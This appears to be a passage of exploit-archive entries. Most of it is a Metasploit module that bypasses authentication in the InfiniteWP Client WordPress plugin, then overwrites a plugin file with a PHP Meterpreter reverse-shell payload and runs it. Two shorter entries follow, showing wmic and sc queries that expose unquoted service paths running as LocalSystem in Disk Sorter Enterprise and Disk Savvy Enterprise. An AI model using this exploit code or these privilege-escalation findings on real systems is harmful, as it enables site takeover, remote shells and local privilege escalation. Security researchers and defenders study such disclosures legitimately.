'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'], ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'], ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html'] ], 'DisclosureDate' => '2020-01-14', 'License' => MSF_LICENSE, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Privileged' => false, 'Targets' => [['InfiniteWP Client < 1.9.4.5', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'} )) register_options([ OptString.new('USERNAME', [true, 'WordPress username', 'admin']), OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php']) ]) register_advanced_options([ OptBool.new('VerifyContents', [false, 'Verify file contents', true]) ]) end def username datastore['USERNAME'] end def plugin_file datastore['PLUGIN_FILE'] end def plugin_uri normalize_uri(wordpress_url_plugins, plugin_file) end def check unless wordpress_and_online? return CheckCode::Unknown('Is the site online and running WordPress?') end unless (version = wordpress_version) return CheckCode::Unknown('Could not detect WordPress version') end if Gem::Version.new(version) >= Gem::Version.new('4.9') return CheckCode::Safe("WordPress #{version} is an unsupported target") end vprint_good("WordPress #{version} is a supported target") check_version_from_custom_file( normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'), /^= ([\d.]+)/, '1.9.4.5' ) end # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php def auth_bypass json = { 'iwp_action' => %w[add_site readd_site].sample, 'params' => {'username' => username} }.to_json res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_backend, 'data' => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}" ) unless res && res.code == 200 && !(cookie = res.get_cookies).empty? fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}") end print_good("Successfully obtained cookie for #{username}") vprint_status("Cookie: #{cookie}") cookie end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Bypassing auth for #{username} at #{full_uri}") unless (@cookie = auth_bypass).include?('wordpress_logged_in') fail_with(Failure::NoAccess, "Could not log in as #{username}") end print_good("Successfully logged in as #{username}") write_and_exec_payload end def write_and_exec_payload print_status("Retrieving original contents of #{plugin_uri}") contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file) unless contents fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}") end print_good("Successfully retrieved original contents of #{plugin_uri}") vprint_status('Contents:') print(contents) print_status("Overwriting #{plugin_uri} with payload") unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie) fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}") end print_good("Successfully overwrote #{plugin_uri} with payload") print_status("Requesting payload at #{plugin_uri}") send_request_cgi({ 'method' => 'GET', 'uri' => plugin_uri }, 0) restore_contents(contents) end def restore_contents(og_contents) print_status("Restoring original contents of #{plugin_uri}") unless wordpress_edit_plugin(plugin_file, og_contents, @cookie) fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}") end return unless datastore['VerifyContents'] contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file) unless contents == og_contents fail_with(Failure::UnexpectedReply, "Current contents of #{plugin_uri} DO NOT match original!") end print_good("Current contents of #{plugin_uri} match original!") end end

Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.disksorter.com Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe Version: 12.4.16 Tested On: Windows 10 (32-bit) C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """ Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto C:\Users\terran>sc qc "Disk Sorter Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Disk Sorter Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Disk Sorter Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem

Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.disksavvy.com Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe Version: 12.3.18 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """ Disk Savvy Enterprise C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe Auto C:\Users\nightelf>sc qc "Disk Savvy Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Disk Savvy Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Disk Savvy Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem